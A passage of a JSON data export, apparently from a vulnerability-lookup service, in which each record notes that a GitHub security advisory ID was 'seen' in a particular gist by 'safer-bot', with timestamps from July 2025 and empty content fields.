"https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "a20cd675-b264-4a54-baa6-1e22fe43f917", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/54d45ce3ed8f40a611c55cfa6d14a164", "content": "", "creation_timestamp": "2025-07-16T17:58:36.000000Z"}, {"uuid": "85ddce02-7aa6-476f-9b93-ec7e71cfc85d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/73742a2b8b6a4a737cc213db48a3ae98", "content": "", "creation_timestamp": "2025-07-16T18:00:17.000000Z"}, {"uuid": "a5487627-cea6-453e-91cf-50838773b354", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "fb61860e-efa2-45ad-bd34-4cf0f3466927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "f4c70804-5dec-4b35-8c86-b8e0cec3c037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "15a4e55b-3cf0-44b0-9c2b-f92b66b17346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "865bd95f-60e6-4c18-8541-bad5a7286a48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "e4655ee6-bc35-4215-ba12-be7c30c88dc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/b16efdaf95610d9f9bb172f3ee852043", "content": "", "creation_timestamp": "2025-07-16T18:00:56.000000Z"}, {"uuid": "eb8bcd1d-918a-4b98-800a-49e957871575", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "e4147cb8-e98e-419d-ada0-9e58b49b9283", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "e65e82ea-d312-4d8d-8429-6ef7bdeaae16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "3c6606b1-a3a1-4658-8feb-8b8cbdf20333", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "2361aa3e-9db1-4af7-a9cc-c1b33725b75a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cgwf-w82q-5jrr", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "79442ca8-4c0a-4a3b-9c13-cbee9c942a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "00a9c534-60a8-4a97-a5f8-6ed378feb705", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/85b034c0980f6110adb6eea451b0bee2", "content": "", "creation_timestamp": "2025-07-16T18:02:40.000000Z"}, {"uuid": "4fde13ad-d791-4709-b563-0eabb6edd584", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/b40c7f38d7526143d347df53295ba5c7", "content": "", "creation_timestamp": "2025-07-16T18:23:57.000000Z"}, {"uuid": "ba708f9b-0198-4429-bdfb-ea1a608104a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2rwm-xv5j-777p", "type": "seen", "source": "https://gist.github.com/safer-bot/d8bb00ef1475907a083e71a73672fdee", "content": "", "creation_timestamp": "2025-07-16T18:33:24.000000Z"}, {"uuid": "e96eb2b8-838a-441f-bbc8-cbdaae8f3072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/d8bb00ef1475907a083e71a73672fdee", "content": "", "creation_timestamp": "2025-07-16T18:33:24.000000Z"}, {"uuid": "9278faaf-75be-489c-b134-9b2c9510e129", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hfq9-hggm-c56q", "type": "seen", "source": "https://gist.github.com/safer-bot/d8bb00ef1475907a083e71a73672fdee", "content": "", "creation_timestamp": "2025-07-16T18:33:24.000000Z"}, {"uuid": "f4009e8c-98dc-404b-802f-805548ef5fbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f8h5-v2vg-46rr", "type": "seen", "source": "https://gist.github.com/safer-bot/d8bb00ef1475907a083e71a73672fdee", "content": "", "creation_timestamp": "2025-07-16T18:33:24.000000Z"}, {"uuid": "03c5e838-c404-44bd-ad15-e41ac53ba927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24rp-q3w6-vc56", "type": "seen", "source": "https://gist.github.com/safer-bot/87d8a38ff72a550ce148dd50ea7ef4a9", "content": "", "creation_timestamp": "2025-07-16T18:32:51.000000Z"}, {"uuid": "fd3cc82d-ade1-463c-a294-8029fdb69247", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hq9p-pm7w-8p54", "type": "seen", "source": "https://gist.github.com/safer-bot/87d8a38ff72a550ce148dd50ea7ef4a9", "content": "", "creation_timestamp": "2025-07-16T18:32:51.000000Z"}, {"uuid": "3063fc16-81a5-4770-81a8-0f3c604605c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "53c13989-c904-4c75-9481-8212100f8600", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "6ac45905-e1d4-4e48-b654-88b60be0a54d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "f7023912-4fa8-4627-9c7c-d8e670ec70f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "5a4960d4-75d5-4a60-8a17-48160a054afe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xmmm-jw76-q7vg", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "ba664e3c-babf-4076-bdaa-04ee87cab6f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "3abc8dc2-2ad4-4386-8e1d-5ceccada1b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9vm7-v8wj-3fqw", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "9eee40ff-4cb3-4690-bd6a-e975c3b516ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93ww-43rr-79v3", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "aebd03cb-686c-4f44-bef7-e8ded5c2085c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g4gc-rh26-m3p5", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "8b8ea2e6-5350-431c-90ab-b68f3a9d6526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "1868ea6a-7fd3-4ab1-989b-f5933a017807", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q4xq-445g-g6ch", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "94441ac9-5c5b-4cd6-b29a-da4c9e356137", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jw7r-rxff-gv24", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "197e42ab-8597-4f9b-a797-4e712a18aa48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4265-ccf5-phj5", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "9881d214-cb61-4a09-aae8-acb42c822435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w97f-w3hq-36g2", "type": "seen", "source": "https://gist.github.com/safer-bot/f123cfc4114c6ea470c678dda860c468", "content": "", "creation_timestamp": "2025-07-16T22:51:35.000000Z"}, {"uuid": "cbea22ca-9028-49b3-8acf-6f6d1aee6feb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/85cf48b1ae9eb571b9f402229b7d9f8d", "content": "", "creation_timestamp": "2025-07-16T22:55:20.000000Z"}, {"uuid": "237b8fe0-3099-4114-a136-9273f1443443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/85cf48b1ae9eb571b9f402229b7d9f8d", "content": "", "creation_timestamp": "2025-07-16T22:55:20.000000Z"}, {"uuid": "ca4acc91-50f2-4a4c-8015-afff6e135517", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/85cf48b1ae9eb571b9f402229b7d9f8d", "content": "", "creation_timestamp": "2025-07-16T22:55:20.000000Z"}, {"uuid": "b3dcca26-e042-4092-acdb-49268ed95b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6phf-6h5g-97j2", "type": "seen", "source": "https://gist.github.com/safer-bot/85cf48b1ae9eb571b9f402229b7d9f8d", "content": "", "creation_timestamp": "2025-07-16T22:55:20.000000Z"}, {"uuid": "d86ee470-82a3-4890-a6a9-b01f5adb6a70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "bbc4eca3-6b17-4edb-8939-18d6421ac43d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "93e41796-1e68-47ed-8a20-f8f09d1e855d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "e962f3d9-3de1-45cd-9818-d2e4e086b46e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fx2c-96vj-985v", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "1b517310-78db-4923-a218-0af624548c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "2894f007-b48b-4f4c-9c8d-a7e790b0724b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5jpm-x58v-624v", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "1c65d8e0-af16-41ac-b85d-b93f7d0bab39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mjq-h674-j845", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "9f44f0b1-040c-42a0-adb6-84e874db63df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hh82-3pmq-7frp", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "6164a67f-abc2-466c-806e-c81e245a6353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/854db19b37d85f8ecc0537be2939d6c9", "content": "", "creation_timestamp": "2025-07-16T22:54:47.000000Z"}, {"uuid": "8a68199f-3037-4bf6-8c2e-b9a09b9ae6f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "28708e44-88bb-4abb-9085-2b71e9bc3a92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "10a839dd-232f-4dc4-8560-2da8f53f13f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/8e70234cf8fba692a651a6a914cbf3a2", "content": "", "creation_timestamp": "2025-07-16T22:57:59.000000Z"}, {"uuid": "ae402c5a-c8ff-4c47-9a7b-2ff4e22f9c31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "ada1a3d4-4d55-4c99-8a63-da8cc4855dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "2d3cb576-4da9-413e-946d-f9b4c3546582", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "d924bb59-ebb9-42dc-85b1-4d7871e19c17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "c1cbd883-4aba-4c59-8997-d38d0db4944e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/f81d2c113af600c696806badcf2b1335", "content": "", "creation_timestamp": "2025-07-16T18:39:26.000000Z"}, {"uuid": "605db435-faf4-45ee-9350-3a520807e14f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wxr5-93ph-8wr9", "type": "seen", "source": "https://gist.github.com/safer-bot/fa463b19ca93498997a6ec1b3496f254", "content": "", "creation_timestamp": "2025-07-16T18:38:17.000000Z"}, {"uuid": "637e39d8-e8ee-4ad6-91e0-3e3616150c24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/fa463b19ca93498997a6ec1b3496f254", "content": "", "creation_timestamp": "2025-07-16T18:38:17.000000Z"}, {"uuid": "e52226f8-b226-46d6-a5a1-41be67cf4386", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/fa463b19ca93498997a6ec1b3496f254", "content": "", "creation_timestamp": "2025-07-16T18:38:17.000000Z"}, {"uuid": "2b8caeca-8449-46ff-85f5-1758619e36bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/387586d674082a4f496dfcc8bda696be", "content": "", "creation_timestamp": "2025-07-16T18:41:09.000000Z"}, {"uuid": "0612a737-0d3e-4c69-8934-722ea6267b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/387586d674082a4f496dfcc8bda696be", "content": "", "creation_timestamp": "2025-07-16T18:41:09.000000Z"}, {"uuid": "77ebe7c7-767c-4200-bbfd-671e47586c06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/70194c75796e377ba2697fcf22e21373", "content": "", "creation_timestamp": "2025-07-16T18:45:02.000000Z"}, {"uuid": "3a4849ae-b232-4dc9-84b1-3b623c13c4eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/70194c75796e377ba2697fcf22e21373", "content": "", "creation_timestamp": "2025-07-16T18:45:02.000000Z"}, {"uuid": "6c5b6df2-99cc-4973-b4e0-35204d2ea0b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47g3-mf24-6559", "type": "seen", "source": "https://gist.github.com/safer-bot/70194c75796e377ba2697fcf22e21373", "content": "", "creation_timestamp": "2025-07-16T18:45:02.000000Z"}, {"uuid": "a4077726-0ce2-4754-b8d1-2b651541838d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "07854dd8-fecf-44d4-8399-dc84e5c9b343", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "3d7277ff-5a96-4854-a0b0-fa2d4079ed37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "a058ae8f-c656-40e1-9056-5f0b18760246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "fc61b5b5-c9a6-40d6-a44c-97a9086990af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/6a43ce27c788fef8c21b6afac4c38e25", "content": "", "creation_timestamp": "2025-07-16T18:44:27.000000Z"}, {"uuid": "6bd94e9f-2210-45b0-99ae-76daea18996a", 